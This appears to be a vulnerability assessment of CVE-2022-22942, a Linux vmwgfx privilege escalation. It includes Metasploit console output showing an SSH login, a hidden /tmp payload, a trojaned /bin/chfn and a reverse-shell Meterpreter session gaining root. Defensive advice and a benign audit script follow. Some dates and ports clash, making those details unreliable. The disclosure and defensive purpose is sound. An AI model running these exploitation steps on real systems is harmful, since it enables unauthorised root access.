Attacker Value
High
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local

CVE-2022-22942

Disclosure Date: December 13, 2023

Description

The vmwgfx driver contains a local privilege escalation vulnerability that allows unprivileged users to gain access to files opened by other processes on the system through a dangling ‘file’ pointer.

Technical Analysis

Description

This vulnerability is a Linux local privilege escalation affecting VMware virtual machines running kernels 4.14-rc1 through 5.17-rc1, caused by a bug in the VMware vmwgfx driver. Specifically, a use-after-free flaw was found in the Linux kernel's vmw_execbuf_copy_fence_user function in drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c, which allows an authenticated user to escalate privileges and spawn a root shell.

Attacker Value & Exploitability

Linux kernel 4.14 was released 12 November 2017 while 5.17 was released 20 March 2022. Although this vulnerability only affects VMware virtual machines, I would expect the attack surface to be rather large given the wide range of kernels affected – about 4.5 years of Linux kernel releases.

Exploitation requires user-level privileges; however, once those are obtained, exploitation is trivial given the Metasploit module written for this vulnerability. Obtain a user session and run the exploit, as demonstrated below:

msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 rport=4444 username=msfuser password=notpassword

[*] 172.16.199.132:22 - Starting bruteforce
[+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 8 opened (172.16.199.1:55151 -> 172.16.199.132:22) at 2023-01-20 09:34:18 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run session=8 rhosts=172.16.199.132 rport=4445

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.1:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120093436_default_172.16.199.132_binchfn_034079.bin
[*] Uploading payload to /tmp/.6ntizxlWd8
[*] Writing '/tmp/.6ntizxlWd8' (282 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.oWt34mDG4b
[*] Meterpreter session 9 opened (172.16.199.1:4445 -> 172.16.199.132:36990) at 2023-01-20 09:34:45 -0500
[*] Replacing trojaned /bin/chfn with original

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Defensive Suggestions

In order to protect yourself against exploitation of this vulnerability, ensure your Linux VM kernels are up to date, and that the VMs are only connected to the network where necessary.

If you're absolutely unable to upgrade the kernel of a vulnerable machine, it is possible to prevent the vulnerable kernel module from loading; Red Hat demonstrates how to do that here: https://access.redhat.com/solutions/41278. However, this is a band-aid fix that promotes poor security posture, so update the kernel whenever possible.
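To make the two signals above checkable on a host (kernel in the 4.14 to 5.17 range stated in the Technical Analysis, vmwgfx module loaded), here is an added audit script that is not part of the original assessment or of the Metasploit module. It assumes the standard modprobe.d `blacklist`/`install` override as the way to stop the module autoloading; the exact stanza in Red Hat's article may differ, and a version-string check cannot see distribution backports, so treat its verdict as a prompt to consult your distribution's advisory.

```shell
#!/bin/sh
# Added audit helper (not code from the assessment above). It reports whether a
# Linux host looks exposed to CVE-2022-22942 using the two signals the text gives:
# a kernel in the affected 4.14 .. 5.17 range and the vmwgfx module loaded.
# Each check takes its input as an argument so it can be run on constructed data.

# kernel_in_affected_range VERSION  (e.g. "5.13.12-051312-generic" or "5.17-rc1")
# Returns 0 when MAJOR.MINOR is within 4.14 .. 5.17 inclusive, else 1.
kernel_in_affected_range() {
    major=$(printf '%s' "$1" | cut -d. -f1)
    minor=$(printf '%s' "$1" | cut -d. -f2 | sed 's/[^0-9].*$//')
    n=$((major * 1000 + minor))
    [ "$n" -ge 4014 ] && [ "$n" -le 5017 ]
}

# vmwgfx_loaded MODULES_TEXT  (the contents of /proc/modules, one module per line)
# Returns 0 when the vmwgfx module is listed, else 1.
vmwgfx_loaded() {
    printf '%s\n' "$1" | grep -q '^vmwgfx '
}

# assess VERSION MODULES_TEXT -> prints one of: exposed, kernel-only, not-exposed
# A version-string check cannot see distro backports, so "exposed" and
# "kernel-only" mean "check against your distribution's advisory", not "vulnerable".
assess() {
    if kernel_in_affected_range "$1"; then
        if vmwgfx_loaded "$2"; then echo exposed; else echo kernel-only; fi
    else
        echo not-exposed
    fi
}

# modprobe_fragment prints a /etc/modprobe.d/ stanza that keeps vmwgfx from
# loading (assumed standard method; "install" also blocks explicit modprobe calls).
# Rebuild the initramfs after installing it, and prefer a kernel update.
modprobe_fragment() {
    printf 'blacklist vmwgfx\ninstall vmwgfx /bin/false\n'
}

# Stand-alone run against the live system (guarded so it is harmless elsewhere).
if [ -r /proc/modules ]; then
    verdict=$(assess "$(uname -r)" "$(cat /proc/modules)")
    echo "CVE-2022-22942 audit: kernel $(uname -r): $verdict"
    if [ "$verdict" = exposed ]; then
        echo "Suggested /etc/modprobe.d/vmwgfx.conf:"
        modprobe_fragment
    fi
fi
```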

CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • vmware

Products

  • photon os 3.0,
  • photon os 4.0
